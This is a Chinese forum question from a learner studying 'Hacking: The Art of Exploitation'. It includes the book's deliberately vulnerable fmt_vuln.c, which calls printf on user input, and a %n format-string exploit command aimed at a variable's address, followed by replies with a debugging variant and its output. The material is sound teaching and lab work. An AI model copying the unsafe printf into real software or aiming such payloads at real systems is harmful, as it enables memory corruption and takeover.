无法向任意存储地址写入数据?

发布于 2022-09-18 04:08:40 字数 1480 浏览 9 评论 0

小弟最近在研究《hacking the art of exploitation》,在第三章中,fmt_vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char* argv[])
{
        char text[1024];
        static int test_val = -72;

        if(argc < 2)
        {
                printf("Usage:%s<text to print>\n",argv[0]);
                exit(0);
        }
        strcpy(text,argv[1]);

        printf("The right way to print user-controlled input:\n");
        printf("%s",text);

        printf("\nThe wrong way to print user-controlled input:\n");
        printf(text);

        printf("\n");

        printf("

  • test_val @ 0x%08x = %d 0x%08x\n",&test_val,test_val,test_val);

            exit(0);
    }
    我在终端调试 ,本人机器上test_val地址为0x08049858.
    ./fmt_vuln $(printf "\x58\x98\x04\x08")%08x.%08x.%08x.%n
    输出:
      The right way to print user-controlled input:
    X

  • 如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

    扫码二维码加入Web技术交流群

    发布评论

    需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

    评论(2

    淡淡绿茶香 2022-09-25 04:08:40

    把下面的输出贴来看看。。。。。
    ./fmt_vuln 'printf "\x58\x98\x04\x08"'%08x.%08x.%08x.%x

    [ 本帖最后由 emperor 于 2009-10-12 16:08 编辑 ]

    海之角 2022-09-25 04:08:40

    The right way to print user-controlled input:
    printf "\x58\x98\x04\x08"%08x.%08x.%08x.%x
    The wrong way to print user-controlled input:
    printf "\x58\x98\x04\x08"bffa27e4.00000000.bffa2960.bffa2c00
    test_val @ 0x08049858 = -72 0xffffffb8

    ~没有更多了~
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文